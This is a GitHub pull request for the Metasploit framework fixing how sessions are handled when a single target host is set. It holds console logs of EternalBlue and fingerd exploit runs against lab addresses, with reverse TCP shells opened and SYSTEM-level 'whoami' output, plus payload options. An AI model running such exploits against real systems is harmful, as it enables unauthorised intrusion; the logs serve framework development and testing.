New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix issue that not interact with session when exploit with single-host rhosts. #10751

Merged
merged 1 commit into from Oct 5, 2018

Conversation

Projects
None yet
2 participants
@Green-m
Contributor

Green-m commented Oct 5, 2018

Fix #10748

Single-host

Interact with session once created.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.6.88
rhosts => 192.168.6.88
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.88:445 - Connecting to target for exploitation.
[+] 192.168.6.88:445 - Connection established for exploitation.
[+] 192.168.6.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.6.88:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.6.88:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.6.88:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.6.88:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.6.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.6.88:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.6.88:445 - Sending all but last fragment of exploit packet
[*] 192.168.6.88:445 - Starting non-paged pool grooming
[+] 192.168.6.88:445 - Sending SMBv2 buffers
[+] 192.168.6.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.6.88:445 - Sending final SMBv2 buffers.
[*] 192.168.6.88:445 - Sending last fragment of exploit packet!
[*] 192.168.6.88:445 - Receiving response from exploit packet
[+] 192.168.6.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.6.88:445 - Sending egg to corrupted connection.
[*] 192.168.6.88:445 - Triggering free of corrupted buffer.
[*] Command shell session 4 opened (192.168.6.164:4444 -> 192.168.6.88:49161) at 2018-10-05 17:28:27 +0800
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

id
id
'id' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows\system32>whoami
whoami
nt authority\system

multiple host

Put session backgroud.

msf5 exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOSTS              192.168.6.88/30  yes       The target address range or CIDR identifier
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.6.164    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Exploiting target 192.168.6.88

[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.88:445 - Connecting to target for exploitation.
[+] 192.168.6.88:445 - Connection established for exploitation.
[+] 192.168.6.88:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.6.88:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.6.88:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.6.88:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.6.88:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.6.88:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.6.88:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.6.88:445 - Sending all but last fragment of exploit packet
[*] 192.168.6.88:445 - Starting non-paged pool grooming
[+] 192.168.6.88:445 - Sending SMBv2 buffers
[+] 192.168.6.88:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.6.88:445 - Sending final SMBv2 buffers.
[*] 192.168.6.88:445 - Sending last fragment of exploit packet!
[*] 192.168.6.88:445 - Receiving response from exploit packet
[+] 192.168.6.88:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.6.88:445 - Sending egg to corrupted connection.
[*] 192.168.6.88:445 - Triggering free of corrupted buffer.
[*] Command shell session 3 opened (192.168.6.164:4444 -> 192.168.6.88:49160) at 2018-10-05 17:27:16 +0800
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.6.88:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Session 3 created in the background.
[*] Exploiting target 192.168.6.89
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.89:445 - Connecting to target for exploitation.
[-] 192.168.6.89:445 - Rex::ConnectionTimeout: The connection timed out (192.168.6.89:445).
[*] Exploiting target 192.168.6.90
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.90:445 - Connecting to target for exploitation.
[-] 192.168.6.90:445 - Rex::ConnectionTimeout: The connection timed out (192.168.6.90:445).
[*] Exploiting target 192.168.6.91
[*] Started reverse TCP handler on 192.168.6.164:4444
[*] 192.168.6.91:445 - Connecting to target for exploitation.
^C[-] 192.168.6.91:445 - Exploit failed [user-interrupt]: Interrupt
[*] Stopping exploiting current target 192.168.6.91...
[*] Control-C again to force quit exploiting all targets.
^C[-] exploit: Interrupted
@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Oct 5, 2018

Contributor
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Exploiting target 127.0.0.0

[-] 127.0.0.0:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.1
[-] 127.0.0.1:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.2
[-] 127.0.0.2:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.3
[-] 127.0.0.3:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.4
[-] 127.0.0.4:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.5
[-] 127.0.0.5:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.6
[-] 127.0.0.6:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.7
[-] 127.0.0.7:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.8
[-] 127.0.0.8:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.9
[-] 127.0.0.9:445 - Exploit failed: The following options failed to validate: LHOST.

This is problematic. It's an infinite RHOSTS-length loop when a required option is unconfigured.

Contributor

wvu-r7 commented Oct 5, 2018

msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Exploiting target 127.0.0.0

[-] 127.0.0.0:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.1
[-] 127.0.0.1:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.2
[-] 127.0.0.2:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.3
[-] 127.0.0.3:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.4
[-] 127.0.0.4:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.5
[-] 127.0.0.5:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.6
[-] 127.0.0.6:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.7
[-] 127.0.0.7:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.8
[-] 127.0.0.8:445 - Exploit failed: The following options failed to validate: LHOST.
[*] Exploiting target 127.0.0.9
[-] 127.0.0.9:445 - Exploit failed: The following options failed to validate: LHOST.

This is problematic. It's an infinite RHOSTS-length loop when a required option is unconfigured.

@Green-m

This comment has been minimized.

Show comment
Hide comment
@Green-m

Green-m Oct 5, 2018

Contributor

@wvu-r7
That's actually many noisy outputs, and to solve this, we have to refactor the method validate during exploit, now this validate method is implemented in exploit_driver, which is called by cmd_exploit a lot of times.
Maybe there is another better idea? I am glad to discuss the lots of details about rhosts exploit, for now, it's still an experiment feature, which is not flawless.

Contributor

Green-m commented Oct 5, 2018

@wvu-r7
That's actually many noisy outputs, and to solve this, we have to refactor the method validate during exploit, now this validate method is implemented in exploit_driver, which is called by cmd_exploit a lot of times.
Maybe there is another better idea? I am glad to discuss the lots of details about rhosts exploit, for now, it's still an experiment feature, which is not flawless.

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Oct 5, 2018

Contributor

Since this is an extant problem (it's in master), and this PR addresses a separate issue, I will land this.

Contributor

wvu-r7 commented Oct 5, 2018

Since this is an extant problem (it's in master), and this PR addresses a separate issue, I will land this.

@wvu-r7 wvu-r7 merged commit 3ec71ed into rapid7:master Oct 5, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request Oct 5, 2018

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Oct 5, 2018

Contributor

Release Notes

This fixes an issue where setting a single host for RHOSTS in an exploit causes sessions to be created in the background with no interaction.

Contributor

wvu-r7 commented Oct 5, 2018

Release Notes

This fixes an issue where setting a single host for RHOSTS in an exploit causes sessions to be created in the background with no interaction.

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Oct 5, 2018

Contributor

Rebased #10700:

msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:7979 - Connecting to fingerd
[*] 127.0.0.1:7979 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:53202) at 2018-10-05 14:42:06 -0500

/usr/ucb/whoami
nobody

Lovely, thank you!

Contributor

wvu-r7 commented Oct 5, 2018

Rebased #10700:

msf5 exploit(bsd/finger/morris_fingerd_bof) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 127.0.0.1:7979 - Connecting to fingerd
[*] 127.0.0.1:7979 - Sending 533-byte buffer
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:53202) at 2018-10-05 14:42:06 -0500

/usr/ucb/whoami
nobody

Lovely, thank you!

@Green-m Green-m deleted the Green-m:issue_10748 branch Oct 6, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment